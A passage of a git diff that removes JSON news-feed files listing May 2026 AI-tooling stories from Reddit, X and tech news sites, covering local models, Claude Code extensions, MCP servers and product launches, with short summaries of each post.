SQLite [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-18T16:00:06.000Z", - "summary": "**Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered \"what was that conversation where I fixed the auth middleware?\" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all…", - "category": "ai_research" - }, - { - "title": "I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time", - "url": "https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-18T10:59:47.000Z", - "summary": "Hey everyone! Running Claude Code in the terminal is amazing, but I hated the \"black box\" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \\*\\*Argus\\*\\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \\* \\*\\*Real-time Timeline:\\*\\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \\* \\*\\*Dependency Graph:\\*\\* Visually maps out which files the agent is touching and how they connect. \\* \\*\\*Cost & Loop Detection:\\*\\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus)", - "category": "ai_tools" - }, - { - "title": "Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T20:55:54.000Z", - "summary": "Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :)", - "category": "ai_models" - }, - { - "title": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…", - "url": "https://x.com/NanoGPTcom/status/2056425379171058008", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-18T17:23:11.000Z", - "summary": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to \"flex\" or", - "category": "ai_models" - }, - { - "title": "Tried every Hermes Agent alternative so you don't have to (2026 roundup)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T17:02:19.000Z", - "summary": "Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \\~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \\~4000 lines of Python you can actual…", - "category": "ai_models" - }, - { - "title": "Configuration Qwen3.6-35b-a3b (12Gb VRAM)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T16:20:14.000Z", - "summary": "Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\\_K\\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\\_K\\_M for this setup? For example, would Q4\\_K\\_M, Q6\\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality?", - "category": "ai_models" - }, - { - "title": "Qwen 35b a3b surprises me", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T15:50:58.000Z", - "summary": "Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode).", - "category": "ai_models" - }, - { - "title": "xAI Launches Grok Build — Three-Way Coding War Is Now Open", - "url": "https://x.com/Business_AI/status/2056374805163856261", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T14:47:43.601Z", - "summary": "xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI.", - "category": "ai_tools" - }, - { - "title": "New models when? Forecasting release date.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-18T09:21:34.000Z", - "summary": "After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about \"open weights\"", - "category": "ai_models" - }, - { - "title": "Cutoff dates of open source models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-18T02:48:12.000Z", - "summary": "I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think", - "category": "ai_models" - }, - { - "title": "Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T23:07:21.000Z", - "summary": "EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \\--- EDIT: Updated model list based on this thread's feedback... \\[Original post body\\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c…", - "category": "ai_models" - }, - { - "title": "memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client", - "url": "https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-05-18T00:20:41.000Z", - "summary": "memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install \"memvee[mcp]\" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url=\"memory.db\", default_user_id=\"alice\", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport=\"streamable-http\") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:…", - "category": "ai_tools" - }, - { - "title": "Every Markdown File You Write for AI is Already Lying to It", - "url": "https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-18T10:34:32.000Z", - "summary": "CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. \"Check package.json if this is stale.\" \"Verify before running.\" \"New packages may have been added since this was written.\" The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for…", - "category": "ai_tools" - }, - { - "title": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…", - "url": "https://x.com/Shruti_0810/status/2056266132592468126", - "source": "X / @shruti_0810", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-18T06:50:24.000Z", - "summary": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automatically recommends: → MCP servers →", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-19.json b/data/news-feed-2026-05-19.json deleted file mode 100644 index d724b0e..0000000 --- a/data/news-feed-2026-05-19.json +++ /dev/null @@ -1,275 +0,0 @@ -{ - "generated": "2026-06-05T00:44:41.184Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-19", - "article_count": 15, - "archived_story_count": 634, - "articles": [ - { - "title": "Google launches Antigravity 2.0 with an updated desktop app and CLI tool", - "url": "https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:45:37.755Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.", - "url": "https://www.digg.com/ai/9p5cqkyn?rank=2", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-19T19:45:35.241Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic just bought the company that generates most production MCP servers", - "url": "https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-19T11:52:46.000Z", - "summary": "Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \\~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo…", - "category": "ai_tools" - }, - { - "title": "favorite Agentic Coding Harness", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T23:53:49.000Z", - "summary": "So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours?", - "category": "ai_models" - }, - { - "title": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…", - "url": "https://x.com/AlternativeTo/status/2056637498978398395", - "source": "X / @alternativeto", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T07:26:04.000Z", - "summary": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ …", - "category": "ai_tools" - }, - { - "title": "Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration", - "url": "https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:45:37.747Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.", - "url": "https://www.digg.com/ai/r5p7scr1?rank=3", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T19:45:35.257Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:17:46.000Z", - "summary": "I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows?", - "category": "ai_models" - }, - { - "title": "OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over", - "url": "https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-19T18:40:02.000Z", - "summary": "this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k…", - "category": "ai_tools" - }, - { - "title": "Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-19T16:50:50.000Z", - "summary": "Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\\_0). Test rig: RTX 3060 Laptop 6GB, \\~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \\~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\\_ctx on this GPU is…", - "category": "ai_models" - }, - { - "title": "bytedance released an open source model that attempts to do just about anything with only 3b parameters", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-19T12:05:26.000Z", - "summary": "Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget.", - "category": "ai_models" - }, - { - "title": "How I built a 9-agent team where my agents actually talk to each other", - "url": "https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-19T09:50:18.000Z", - "summary": "I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: \"senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br…", - "category": "ai_tools" - }, - { - "title": "We have sub-agents at home", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T01:38:42.000Z", - "summary": "At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \\`--slot-save-path\\` and the \\`s…", - "category": "ai_models" - }, - { - "title": "Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)", - "url": "https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/", - "source": "Reddit r/ChatGPT", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T06:46:11.000Z", - "summary": "Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t…", - "category": "ai_tools" - }, - { - "title": "Centralize SKILLs", - "url": "https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T04:35:20.000Z", - "summary": "We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this?", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-20.json b/data/news-feed-2026-05-20.json deleted file mode 100644 index d7cf033..0000000 --- a/data/news-feed-2026-05-20.json +++ /dev/null @@ -1,261 +0,0 @@ -{ - "generated": "2026-06-05T00:44:41.365Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-20", - "article_count": 15, - "archived_story_count": 630, - "articles": [ - { - "title": "Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments", - "url": "https://www.digg.com/ai/xizlma81", - "source": "Digg AI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-20T06:02:26.989Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Put your spare Claude cycles on night shift: help review open-source packages", - "url": "https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-20T21:15:12.000Z", - "summary": "Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre…", - "category": "ai_tools" - }, - { - "title": "Re. what ever happened to Cohere’s Command-A series of models?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-20T21:25:50.000Z", - "summary": "Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a 